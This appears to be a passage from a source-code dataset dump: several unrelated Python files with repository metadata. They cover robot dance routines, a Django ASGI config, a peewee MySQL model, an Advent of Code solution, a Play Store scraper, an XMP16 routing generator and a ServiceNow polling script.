if (self.SPEEDRAMP<0):
self.SPEEDRAMP=0
elif (self.SPEEDRAMP>330):
self.SPEEDRAMP=330
if (self.SPEEDSET > 150):
if (0<x<10):
x=10
if (self.SPEEDRAMP>150):
self.SPEEDRAMP = 150
elif (-10<x<0):
x=-10
if (self.SPEEDRAMP>150):
self.SPEEDRAMP = 150
if (0<y<10):
y=10
if (self.SPEEDRAMP>150):
self.SPEEDRAMP = 150
elif (-10<y<0):
y=-10
if (self.SPEEDRAMP>150):
self.SPEEDRAMP = 150
else:
if (0<x<5):
x=5
elif (-5<x<0):
x=-5
if (0<y<5):
y=5
elif (-5<y<0):
y=-5
#self.xramp = x
#self.yramp = y
if (self.xramp < self.lastx):
self.xramp += 1
elif (self.xramp == self.lastx):
pass
else:
self.xramp -= 1
if (self.yramp < self.lasty):
self.yramp += 1
elif (self.yramp == self.lasty):
pass
else:
self.yramp -= 1
if (x==0 and y==0):
self.SPEEDRAMP -= (self.SPEEDSET/10)
else:
if ((abs(self.xramp-x)>20) or (abs(self.yramp-y)>20)):
self.SPEEDRAMP = 50
if (self.SPEEDRAMP<0):
self.SPEEDRAMP=0
self.lastx = x
self.lasty = y
print (self.xramp, x, self.lastx, self.yramp, y, self.lasty, self.SPEEDRAMP, self.SPEEDSET)
# if (self.touch6):
self.robot.setMotors(self.xramp, self.yramp, self.SPEEDRAMP)
self.robot.flushing()
if tr == 1:
self.optiona()
if ci == 1:
self.optionb()
if xx == 1:
self.optionc()
if sq == 1:
self.optiond()
# if (self.touch6):
# pub_LED.publish(1)
# if (self.touch0 or self.touch1):
# self.left()
# if (self.touch3 or self.touch2):
# self.right()
# if (self.touch4):
# self.back()
# if (self.touch5):
# self.fwd()
# elif (self.touch7):
# pub_LED.publish(1)
# if (self.touch0 or self.touch1):
# self.leftFast()
# if (self.touch3 or self.touch2):
# self.rightFast()
# if (self.touch4):
# self.backFast()
# if (self.touch5):
# self.fwdFast()
# else:
# pub_LED.publish(0)
# wait, then do it again
r.sleep()
# shut down
self.robot.setLDS("off")
self.robot.setTestMode("off")
# SQUARE
def optiona(self):
self.lightup(1,3)
self.lightup(0,1)
self.lightup(1,1)
self.lightup(0,1)
self.lightup(1,1)
self.lightup(0,1)
self.lightup(1,1)
self.lightup(0,1)
# TRIANGLE
def optionb(self):
# self.right(325,300)# almost 120 degree
# self.fwd()
BEET=.98
#Enter
self.fwd(1000,100,BEET)
self.right(300,130,BEET)
self.fwd(1000,100,BEET)
self.right(300,130,BEET)
#03 forward
self.fwd(0,0,7*BEET)
self.fwd(0,0,BEET)
# shake
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.left(100,50,0.5*BEET)
self.right(100,50,0.5*BEET)
self.fwd(0,0,0.5*BEET)
#Turn pause, turn pause
self.left(400,220,3*BEET)
self.fwd(0,0,0.05*BEET)
self.left(600,250,BEET)
self.fwd(0,0,0.1*BEET)
# self.lightup(1,BEET)
# self.lightup(0,0.5*BEET)
# self.lightup(1,BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.right(300,120,3*BEET)
self.fwd(0,0,BEET)
self.right(300,150,0.55*BEET)
self.left(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.left(300,150,0.55*BEET)
self.right(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.right(300,150,0.55*BEET)
self.left(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.left(300,150,0.55*BEET)
self.right(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.fwd(0,0,0.5*BEET)
self.back(1000,100,0.5*BEET)
self.back(0,0,0.5*BEET)
self.back(1000,100,0.5*BEET)
self.back(0,0,0.5*BEET)
self.back(1000,100,0.5*BEET)
self.back(0,0,0.5*BEET)
self.back(1000,100,0.5*BEET)
self.back(0,0,0.5*BEET)
self.left(300,100,2*BEET)
self.left(600,250,BEET)
self.fwd(0,0,BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.right(600,250,2*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.left(2200,150,12*BEET)
self.fwd(0,0,2*BEET)
#Thriller
self.right(300,150,0.55*BEET)
self.left(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.left(300,150,0.55*BEET)
self.right(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.left(600,250,BEET)
self.fwd(0,0,BEET)
self.right(50,50,0.5*BEET)
self.left(50,50,0.5*BEET)
self.right(50,50,0.5*BEET)
self.left(50,50,0.5*BEET)
#Thriller
self.right(300,150,0.55*BEET)
self.left(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.left(300,150,0.55*BEET)
self.right(300,150,0.55*BEET)
self.fwd(1000,100,BEET)
self.right(100,200,0.5*BEET)
self.left(600,250,BEET)
self.fwd(0,0,2*BEET)
self.right(50,50,0.5*BEET)
self.left(50,50,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(0,0,2*BEET)
self.left(600,250,BEET)
self.right(50,50,0.5*BEET)
self.left(50,50,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
self.fwd(1000,100,0.5*BEET)
self.fwd(0,0,0.5*BEET)
# CIRCLE IS FOR TESTING
def optionc(self):
BEET=.98
#Enter
self.fwd(1000,100,BEET)
self.right(300,130,BEET)
self.fwd(1000,100,BEET)
self.right(300,130,BEET)
# X
def optiond(self):
self.lightup()
def fwd(self,DISTANCE,SPEED,SLEEP):
self.robot.setMotors(-DISTANCE,-DISTANCE,SPEED)
rospy.sleep(SLEEP)
def back(self,DISTANCE,SPEED,SLEEP):
self.robot.setMotors(DISTANCE,DISTANCE,SPEED)
rospy.sleep(SLEEP)
def right(self,ANGLE,SPEED,SLEEP):
self.robot.setMotors(ANGLE,-ANGLE,SPEED)
rospy.sleep(SLEEP)
def left(self,ANGLE,SPEED,SLEEP):
self.robot.setMotors(-ANGLE,ANGLE,SPEED)
rospy.sleep(SLEEP)
def stop(self):
SPEED=00
self.robot.setMotors(00,00,SPEED)
rospy.sleep(1)
self.robot.setMotors(00,00,SPEED)
def lightup(self,SWITCH,BEET):
pub_LED.publish(SWITCH)
rospy.sleep(BEET)
def joy_handler(self, ps):
self.Butt = ps.buttons
self.Axess = ps.axes
def cbon04(self, on):
pub_LED.publish(on.data)
print(on.data)
if on.data == 1:
self.touch6=True
elif on.data == 0:
self.touch6=False
if __name__ == "__main__":
robot = NeatoNode()
pub_LED = rospy.Publisher("/led04", Int8, queue_size=10)
robot.spin() | [
"charisma@engr.oregonstate.edu"
] | charisma@engr.oregonstate.edu |
286cc8c250f2c2b4030ffc5e75d7d1213b47a934 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_yens.py | f7c90d82f8fc7ae9864e4492c2449f9c31d5b2f4 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py |
from xai.brain.wordbase.nouns._yen import _YEN
#calss header
class _YENS(_YEN, ):
def __init__(self,):
_YEN.__init__(self)
self.name = "YENS"
self.specie = 'nouns'
self.basic = "yen"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
a31d0693760097d9ec0bfc62e4a5c4d7383c09ab | 378b200007c5d3633572b61eb3dd2180748086b7 | /chefsBackEnd/chefsBackEnd/asgi.py | d077d3550da2054b45a48c64401ec50a84113e40 | [] | no_license | jgartsu12/chefs-table-backend | 4163c2c9a2bb586d4432c332238682bf282ef967 | 71611cf17aa457f8bc9a7ec7d853c570062d22fb | refs/heads/master | 2022-12-16T04:22:30.954831 | 2020-07-08T19:24:37 | 2020-07-08T19:24:37 | 251,097,796 | 1 | 0 | null | 2022-12-08T10:13:44 | 2020-03-29T17:59:15 | Python | UTF-8 | Python | false | false | 401 | py | """
ASGI config for chefsBackEnd project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'chefsBackEnd.settings')
application = get_asgi_application()
| [
"jgartsu12@gmail.com"
] | jgartsu12@gmail.com |
1ce439080e353228f843746415b1a67a0d6b4687 | 4b73dc6b31bd2e25957c70677dc6fd0135a1a43b | /03_Avanzado/Unidad_06/model/model_db.py | 9474f3ed766ea4db9d09dd0d7f51460ac86ac069 | [] | no_license | stick2yourmind/Python | 557aae4b8422104ec244dcd45123b1c0b4ed2d7a | 9629add21493bea0173fa6ed548bedb18e73fa32 | refs/heads/master | 2022-11-17T10:00:53.622658 | 2020-07-13T01:21:49 | 2020-07-13T01:21:49 | 272,263,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,503 | py | import mysql.connector
from peewee import *
import datetime
# global variables connection to db
my_sql_db = "catalogueDB"
my_sql_host = "localhost"
my_sql_port = 3306
my_sql_user = "root"
my_sql_pass = ""
my_sql_table = "RegItem"
my_sql_struct = "CREATE TABLE IF NOT EXISTS producto( id int(11) NOT NULL PRIMARY KEY \
AUTO_INCREMENT, titulo VARCHAR(128) COLLATE utf8_spanish2_ci NOT NULL, descripcion text COLLATE \
utf8_spanish2_ci NOT NULL )"
# Creating a db connection
db = MySQLDatabase(my_sql_db, host=my_sql_host, port=my_sql_port,
user=my_sql_user,
passwd=my_sql_pass)
# Access to db
class Catalogue(Model):
class Meta:
database = db
# Access to table
class RegItem(Catalogue):
titulo = TextField()
fecha = DateTimeField(default=datetime.datetime.now())
descripcion = TextField()
estado = BooleanField(default=True)
objeto = TextField()
def __str__(self):
return "El título es: " + self.titulo
def create_db_my_sql():
"""
Create a database. Its name will be my_sql_db.
Parameters
----------
my_sql_host : str
MySQL's host.
my_sql_user : str
User of host.
my_sql_pass : str
User's password.
my_sql_db : str
Database's name to create.
Returns
-------
None : None
has no return
"""
print("\t\tcreate_db_my_sql: starting")
global my_sql_db
global my_sql_host
global my_sql_user
global my_sql_pass
aux = -1
try:
my_db = mysql.connector.connect(
host=my_sql_host,
user=my_sql_user,
passwd=my_sql_pass)
my_cursor = my_db.cursor()
my_cursor.execute("CREATE DATABASE IF NOT EXISTS " + my_sql_db)
my_db.commit()
my_cursor.close()
my_db.close()
aux = 1
print("\t\tcreate_db_my_sql: DB has been created")
except:
print("\t\tcreate_db_my_sql: Error")
print("\t\tcreate_db_my_sql: finished")
return aux
def create_table_orm():
print("\t\tcreate_table_orm: starting")
global db
global RegItem
aux = -1
try:
db.connect()
db.create_tables([RegItem])
db.close()
aux = 1
print("\t\tcreate_table_orm: Table has been created")
except:
print("\t\tcreate_table_orm: Error")
print("\t\tcreate_table_orm: finished")
return aux
def print_add(fn):
def console_printer(*args):
print("\t\t\tprint_add: título = ", args[0]) # args[0] primer parámetro de add_reg_orm
print("\t\t\tprint_add: descripción = ", args[1]) # args[1] segundo parámetro de add_reg_orm
aux = fn(*args) # fn(*args) add_reg_orm's return
if aux != -1:
print("\t\t\tprint_add: One register has been added by using decorator")
else:
print("\t\t\tprint_add: Register could not been added by using decorator")
return aux
return console_printer
@print_add
def add_reg_orm(titulo, descripcion):
print("\t\tadd_reg_orm: starting")
global db
global RegItem
aux = -1
try:
db.connect()
obj = RegItem(titulo=titulo, descripcion=descripcion)
print("\t\t", obj)
obj = RegItem(titulo=titulo, descripcion=descripcion, objeto=str(obj))
obj.save()
db.close()
aux = 1
print("\t\tadd_reg_orm: Register has been added")
except:
print("\t\tadd_reg_orm: Error")
print("\t\tadd_reg_orm: finished")
return aux
def show_reg_orm():
print("\t\tshow_reg_orm: starting")
global db
global RegItem
aux = -1
try:
db.connect()
fetched = []
query = RegItem.select(RegItem.id, RegItem.titulo, RegItem.fecha, RegItem.descripcion, RegItem.estado,
RegItem.objeto)
for item in query:
fetched.append((item.id, item.titulo, item.fecha,
item.descripcion, item.estado, item.objeto))
db.close()
print("\t\tshow_reg_orm: Data fetched returned")
aux = 1
except:
print("\t\tshow_reg_orm: Error")
print("\t\tshow_reg_orm: finished")
if aux == -1:
return aux
else:
return fetched
def print_delete(fn):
def console_printer(*args):
print("\t\t\tprint_delete: id = ", args[0]) # args[0] primer parámetro de delete_reg_orm
aux = fn(*args)
if aux != -1:
print("\t\t\tprint_delete: One register has been deleted by using decorator")
else:
print("\t\t\tprint_delete: Register could not been deleted by using decorator")
return aux
return console_printer
@print_delete
def delete_reg_orm(id_reg):
print("\t\tdelete_reg_orm: starting")
global db
global RegItem
aux = -1
try:
db.connect()
deleteReg = RegItem.get(RegItem.id == int(id_reg))
deleteReg.delete_instance()
db.close()
aux = 1
print("\t\tdelete_reg_orm: Register deleted")
except:
print("\t\tdelete_reg_orm: Error")
print("\t\tdelete_reg_orm: finished")
return aux
def print_update(fn):
def console_printer(*args):
print("\t\t\tprint_update: id = ", args[0][0]) # args[0][0] primer elemento del parámetro de update_register_orm
print("\t\t\tprint_update: título = ", args[0][1]) # args[0][1] segundo elemento del primer parámetro de update_register_orm
print("\t\t\tprint_update: descripción = ", args[0][2]) # args[0][2] tercer elemento del primer parámetro de update_register_orm
aux = fn(*args)
if aux != -1:
print("\t\t\tprint_update: One register has been updated by using decorator")
else:
print("\t\t\tprint_update: Register could not been updated by using decorator")
return aux
return console_printer
@print_update
def update_register_orm(reg_item):
print("\t\tupdate_register_orm: starting")
global db
global RegItem
aux = -1
try:
db.connect()
updateReg = RegItem(titulo=reg_item[1], descripcion=reg_item[2])
updateReg = RegItem.update(titulo=reg_item[1], descripcion=reg_item[2], objeto=str(updateReg)).where(
RegItem.id == reg_item[0])
updateReg.execute()
db.close()
aux = 1
print("\t\tupdate_register_orm: Register updated")
except:
print("\t\tupdate_register_orm: Error")
print("\t\tupdate_register_orm: finished")
return aux
| [
"saravia.jonathan.m@gmail.com"
] | saravia.jonathan.m@gmail.com |
764c228e5a8b115f7ca60c1480fdff36b20ab047 | 8a3726abfc9cb72d8ccf7d32b18edabf8d16b630 | /18/a.py | 32847a4eb7fdc71ad694396872b27a628860cf2a | [] | no_license | alex-stephens/aoc2015 | 48a46efc1a888ea2d451a5938fc404d26e96e1a0 | ccc1c85f8da7a0585003b2e4f99f3f1def35ec0b | refs/heads/master | 2023-02-05T23:02:19.148138 | 2020-12-27T19:16:47 | 2020-12-27T19:16:47 | 324,579,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | grid = [list(line.strip()) for line in open('input.txt').readlines()]
rows, cols = len(grid), len(grid[0])
def count_neighbours(i, j):
rmin, rmax = max(i-1, 0), min(i+1, rows-1)
cmin, cmax = max(j-1, 0), min(j+1, cols-1)
ans = 0
for r in range(rmin, rmax+1):
for c in range(cmin, cmax+1):
if (r,c) == (i,j):
continue
ans += 1 if grid[r][c] == '#' else 0
return ans
it = 100
for i in range(it):
new_grid = [['x' for _ in range(cols)] for _ in range(rows)]
for r in range(rows):
for c in range(cols):
count = count_neighbours(r,c)
if grid[r][c] == '#' and (count != 2 and count != 3):
new_grid[r][c] = '.'
elif grid[r][c] == '.' and count == 3:
new_grid[r][c] = '#'
else:
new_grid[r][c] = grid[r][c]
grid = [list(x) for x in new_grid]
# print('--------------------------')
# for g in grid:
# print(''.join(g))
print(sum([''.join(r).count('#') for r in grid])) | [
"alexstephens9@gmail.com"
] | alexstephens9@gmail.com |
902a07d53dec1a6b87a8c1e0e0457c6e4508b338 | 11a1d7c276cee26c7351a7d5b2049d3fd36dfa9f | /venv/Lib/site-packages/google_play_scraper/features/app.py | 74838cc49db0d4d37b7f0f3ea41625bbb6235bcd | [] | no_license | Hussain-py/apiprojec | 5a09a9a3ab576f72a0d42cf0897352a0f4748343 | efab41268de6c1daf7029eb41e28b3526b298a46 | refs/heads/main | 2023-02-24T23:32:24.332619 | 2021-01-25T09:42:41 | 2021-01-25T09:42:41 | 332,697,592 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | import json
from google_play_scraper.constants.element import ElementSpecs
from google_play_scraper.constants.regex import Regex
from google_play_scraper.constants.request import Formats
from google_play_scraper.utils.request import get
def app(app_id, lang="en", country="us"):
# type: (str, str, str) -> dict
url = Formats.Detail.build(app_id=app_id, lang=lang, country=country)
dom = get(url)
matches = Regex.SCRIPT.findall(dom)
res = {}
for match in matches:
key_match = Regex.KEY.findall(match)
value_match = Regex.VALUE.findall(match)
if key_match and value_match:
key = key_match[0]
value = json.loads(value_match[0])
res[key] = value
result = {}
for k, spec in ElementSpecs.Detail.items():
content = spec.extract_content(res)
result[k] = content
result["appId"] = app_id
result["url"] = url
return result
| [
"57086628+MrArif-5@users.noreply.github.com"
] | 57086628+MrArif-5@users.noreply.github.com |
7c8f45f5a09a6881f6fe5b227cde0ad599b55eb3 | f0395a509853c866c5193398ff445b11e7892536 | /tools/xmp16-routegen.py | 98a6110eb30e42f48b26bd0bd58196ab05749201 | [
"LicenseRef-scancode-other-permissive"
] | permissive | stevekerrison/tool_swallow_manycore | a9932f74c88327dfd2eb183b1aac0a29988ebbb2 | 64c5732cf732038c61fcf5ff635b363b1d7124b5 | refs/heads/master | 2021-01-10T03:28:54.711808 | 2015-11-26T12:37:48 | 2015-11-26T12:37:48 | 46,926,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,942 | py | #!/usr/bin/python
# Copyright (C) 2012 Steve Kerrison <github@stevekerrison.com>
#
# This software is freely distributable under a derivative of the
# University of Illinois/NCSA Open Source License posted in
# LICENSE.txt and at <http://github.xcore.com/>
header = \
"""xmp16-routegen.py
A script for generating routing tables, link settings and JTAG mappings for the
XMP16 UoB development board.
Author: Steve Kerrison <steve.kerrison@bristol.ac.uk>
Created: 11th May 2012
Accepts one argument in the form of a matlab-style matrix definition, where a
'1' signifies a board and a '0' does not. From this the network dimensions are
calculated. This is currently a redundant format due to it only supporting
rectangular board arrangements! Maybe in the future it'll be more flexible, but
it's not likely to need it in the mean time.
If "M" is specified as an additional argument, an L1 memory board is added to
the right of the top row of boards.
Example for a 2x2 mesh of boards: ./xmp16-routegen.py "1 1; 1 1"
Example for a 2x3 mesh of boards with memory: ./xmp16-routegen.py "1 1 1;1 1 1" M
"""
import sys,math
if len(sys.argv) != 2 and len(sys.argv) != 3:
print >> sys.stderr, header
sys.exit(1)
#Description of a single board's JTAG map
jtagmap = [ \
3, 2, 4, 5, \
1, 0, 6, 7, \
15, 14, 8, 9, \
13, 12, 10, 11 \
]
#How the board's JTAG quadrants are broken down
nodequadrants = [ \
0, 0, 1, 1, \
0, 0, 1, 1, \
3, 3, 2, 2, \
3, 3, 2, 2 \
]
dirmap = { \
'towards':0,'away':1, \
'left':2,'right':3, \
'up':4,'down':5 \
}
linkmap = [ \
{'a':'up','b':'down','efgh':'towards'}, \
{'a':'left','b':'right','efgh':'away'}, \
{'a':'up','b':'down','efgh':'towards'}, \
{'a':'left','b':'right','efgh':'away'}, \
]
linkregs = { 'a':0x22,'b':0x23,'c':0x20,'d':0x21, \
'e':0x26,'f':0x27,'g':0x24,'h':0x25 }
linkenable = { 'a':0x82,'b':0x83,'c':0x80,'d':0x81,\
'e':0x86,'f':0x87,'g':0x84,'h':0x85 }
nodereg = 0x05
networkpos = 4
networkwidth = 2
dirwidth = 4
dirpos = 8 #In the link control register
dirreg = 0x0c
lmap = [['towards','away'],['towards','away']]
xmap = [['towards','towards'],['right','left']]
ymap = [['down','up'],['away','away']]
#Xscopemap applied differently to the regular routing maps: row0, row1, row(>1)
scopemap = [\
['down','away','away','down'],\
['towards','left','left','towards'],\
['up','away','away','up']\
]
#Temporary mapping for memory: row0, row(>0)
memmap = [\
['towards','left','left','towards'],\
['up','away','away','up']\
]
#xmap = [['right','left'],['right','left'],['right','left'],['right','left']]
#ymap = [['down','up'],['left','left'],['right','right'],['down','up']]
#zmap = [['right','right'],['right','towards'],['away','left'],['left','left']]
#Deal with the memory board creating an irregular mesh.
#zmapmend = [['right','right'],['right','towards'],['right','left'],['up','left']]
rawconfig = sys.argv[1]
M = len(sys.argv) == 3 and sys.argv[2] == "M"
configrows = rawconfig.split(';')
config = []
for x in configrows:
config.append(map(int,x.strip().split(' ')))
#print config
#Boards are 4x4 nodes
xboardnodes = 4
yboardnodes = 4
boardnodes = xboardnodes * yboardnodes
xmemboard = int(M)
xboards = len(config[0])
yboards = len(config)
numcores = xboards * yboards * 16
xboardbits = int(math.ceil(math.log(xboardnodes)/math.log(2)))
yboardbits = int(math.ceil(math.log(yboardnodes)/math.log(2)))
xbits = int(math.ceil(math.log(xboards)/math.log(2)))
ybits = int(math.ceil(math.log(yboards)/math.log(2)))
lbits = 1 #This is the layer of the mesh that the core occupies - there are only two layers
boardbits = xboardbits + yboardbits
totalbits = boardbits+xbits+ybits
def calcdirs(lst,data,width,dirs):
for b in range(width):
x = ([dirs[0]]*(2**b) + [dirs[1]]*(2**b))*(2**(width-1)/2**b)
lst.append(x[data & (2**width-1)])
def calcjtag(y,z,c):
n = nodequadrants[c]
if n == 0:
if y == 0 and z == 0:
blocksbefore = 0
elif z == 0:
blocksbefore = (2*yboards*(((xboards-1)*2)+1)) + ((yboards-1-y)*2) + 2
else:
blocksbefore = (2*y*(((xboards-1)*2)+1))+(z*2)
elif n == 1:
blocksbefore = (2*y*(((xboards-1)*2)+1))+(z*2)+1
elif n == 2:
blocksbefore = (2*y*(((xboards-1)*2)+1))+((xboards-1)*2)+((xboards-1-z)*2)+2
else:
if z == 0:
blocksbefore = (2*yboards*(((xboards-1)*2)+1)) + ((yboards-1-y)*2) + 1
else:
blocksbefore = (2*y*(((xboards-1)*2)+1))+((xboards-1)*2)+((xboards-1-z)*2)+3
offset = n * 4
#print "c:",c
#print "bb:",blocksbefore
return (blocksbefore * 4) + jtagmap[c] - offset
#TODO: Fix routing as it's currently going to use nonexistant links to get to the memory board
"""def memboard(y,z,c):
global jtagmap
nodeid = (z+1) << (boardbits + ybits)
route = []
jtagmap = [j + 1 for j in jtagmap]
jtagnode = calcjtag(y,z,c-1)
print
print "# MEMORY BOARD START"
print "JTAG Node =",jtagnode
print hex(nodereg),"=",hex(nodeid),("\t#0b{0:0%db}" % totalbits).format(nodeid)
calcdirs(route,nodeid,xbits,xmap[nodeid&((xbits**2)-1)])
calcdirs(route,nodeid>>xbits,yboardbits,ymap[nodeid&((xbits**2)-1)])
calcdirs(route,nodeid>>(xbits+yboardbits),ybits,ymap[nodeid&((xbits**2)-1)])
calcdirs(route,nodeid>>(xbits+yboardbits+ybits),zbits,zmap[nodeid&((xbits**2)-1)])
directions = map(lambda x: dirmap[x],route)
linkdir = { \
'a': dirmap['left'], \
}
for links in linkdir:
for l in links:
print hex(linkregs[l]),"=",hex(linkdir[links]<<dirpos)
dirregs = [0,0]
dirregspos = 0
for k,d in enumerate(directions):
dirregs[dirregspos] |= directions[k]<<(k*dirwidth)
if k == 7:
dirregspos += 1
for k,d in enumerate(dirregs):
print hex(dirreg+k),"=",hex(d)
print "# MEMORY BOARD END"
print "# Resuming XMP16 board..."""
print "DIM = %d(%d)x%d(%d)" % (yboards,ybits,xboards,xbits)
def parity(x):
k = 0
d = x
while d != 0:
k = k + 1
d = d & (d - 1)
return k % 2
for y in range(yboards):
for x in range(xboards):
if config[y][x] != 1:
print >> sys.stderr, "ERROR:",sys.argv[0], "does not yet support non-rectangular board arrangements"
sys.exit(2)
#print y,x
print
print "#new board, position",y,x
for c in range(boardnodes):
#New node ID strategy is [y..y x..x c]
#c = 0 for c & 0x3 in 0,3 and c = 1 for c & 0x3 in 1,2
layer = parity(c&0x3)
nodeid = layer | (c & 0x2) | (x << xboardbits) | ((c & 0xc) << (xboardbits + xbits - 2)) | (y << (boardbits + xbits))
if M and c == 8 and y == 0 and x == xboards - 1:
memboard(y,x,c)
route = []
jtagnode = calcjtag(y,x,c)
print
print "JTAG Node =",jtagnode
print hex(nodereg),"=",hex(nodeid),("\t#0b{0:0%db}" % totalbits).format(nodeid)
calcdirs(route,nodeid,lbits,lmap[layer])
calcdirs(route,nodeid>>lbits,xbits+xboardbits-lbits,xmap[layer])
calcdirs(route,nodeid>>(xbits+xboardbits),ybits+yboardbits,ymap[layer])
# Meddle with the routing table on the end boards if a memory board is present
"""if M and x == xboards - 1 and c not in [2,3]:
calcdirs(route,nodeid>>(xbits+yboardbits+ybits),zbits,zmapmend[nodeid&((xbits**2)-1)])
else:
calcdirs(route,nodeid>>(xbits+yboardbits+ybits),zbits,zmap[nodeid&((xbits**2)-1)])"""
directions = map(lambda x: dirmap[x],route)
#print directions
linkdir = { \
'a': dirmap[linkmap[nodeid&((xboardbits**2)-1)]['a']], \
'b': dirmap[linkmap[nodeid&((xboardbits**2)-1)]['b']], \
'efgh': dirmap[linkmap[nodeid&((xboardbits**2)-1)]['efgh']] \
}
#route.reverse()
#print route
#print linkdir
for links in linkdir:
for l in links:
print hex(linkregs[l]),"=",hex(linkdir[links]<<dirpos)
dirregs = [0,0]
dirregspos = 0
for k,d in enumerate(directions):
dirregs[dirregspos] |= directions[k]<<(k*dirwidth)
if k == 7:
dirregspos += 1
#Poke in some XSCOPE stuff!!
row = min(2,c/xboardnodes + yboardnodes*y)
dirregs[1] |= dirmap[scopemap[row][c & 0x3]] << 28
row = min(1,c/xboardnodes + yboardnodes*y)
dirregs[1] |= dirmap[memmap[row][c & 0x3]] << 24
for k,d in enumerate(dirregs):
print hex(dirreg+k),"=",hex(d)
# Now throw away any links that are unconnected
if (x == 0 and (c % 4) == 1):
del linkdir['a']
elif x == xboards - 1 and (c % 4) == 2 and not (M and c == 2 and y == 0 and x == xboards - 1):
del linkdir['b']
elif y == 0 and c in [0,3]:
del linkdir['a']
elif y == yboards - 1 and c in [12,15]:
del linkdir['b']
print "Links:",
for i in [hex(linkenable[item]) for sublist in list(linkdir) for item in sublist]:
print str(i),
print
| [
"steve@stevekerrison.com"
] | steve@stevekerrison.com |
dadb8fb69ef2bdb6c0a196c367f65a32f893e669 | c2f7af7a77c3d2a57f4b6b1d27e1cd907889e3b4 | /CheckForRecipie.py | 785164c0be5a5e595bb5c7cd98fc6f985f8f557f | [] | no_license | Ngoc7-psu/ABIST440WLUKE | b87d779615619b408d660dca653f75937f6f4b54 | d0d63f55dfa5ba1152d4db9ced292132682853bd | refs/heads/master | 2022-04-20T17:49:52.972134 | 2020-04-21T02:39:26 | 2020-04-21T02:39:26 | 257,392,875 | 0 | 0 | null | 2020-04-20T20:13:17 | 2020-04-20T20:13:16 | null | UTF-8 | Python | false | false | 2,193 | py | # Team Ferment - James Bee, Virginia Hoffman, Michaela Fox, and Samantha Scheer
# IST 440 - Luke Kasper
import requests
import json
import time
def _fetch_latest():
    """Query ServiceNow for brew records created in the last minute.

    Returns the decoded JSON response dict (and prints it, preserving the
    original script's console output).  Exits the process on any non-200
    HTTP status, mirroring the original error handling.
    """
    url = 'https://emplkasperpsu1.service-now.com/api/now/table/x_snc_beer_brewing_mother_brewv2?sysparm_query=sys_created_onRELATIVEGT%40minute%40ago%401&sysparm_limit=1'
    # FIXME(security): credentials are hard-coded in source; move them to a
    # config file or environment variables before publishing this script.
    user = 'mmf5571'
    pwd = '***'
    headers = {"Content-Type": "application/json", "Accept": "application/json"}
    response = requests.get(url, auth=(user, pwd), headers=headers)
    if response.status_code != 200:
        print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:', response.json())
        exit()
    data = response.json()
    print(data)
    return data


def CheckForRecipies():
    """Poll ServiceNow every 25 seconds until a new brew recipe record
    appears, then hand off to the TeamFerment module."""
    data = _fetch_latest()
    # Pull out the target Raspberry Pi if a record was actually returned.
    # (The original code indexed result[0] unconditionally, which raised
    # IndexError whenever no record had been created in the last minute.)
    result = data.get('result') or []
    if result:
        startTask = result[0]['rpi_to_execute']
        FermentPi = startTask['FermentPi']  # noqa: F841 - kept for parity with original
    # Sentinel for "no data yet"; the original shadowed the builtin `list`.
    EMPTY = {}
    while data == EMPTY:
        data = _fetch_latest()
        time.sleep(25)
    if data != EMPTY:
        # Importing TeamFerment kicks off the brew workflow as an import
        # side effect (style preserved from the original script).
        import TeamFerment


CheckForRecipies()
| [
"noreply@github.com"
] | noreply@github.com |
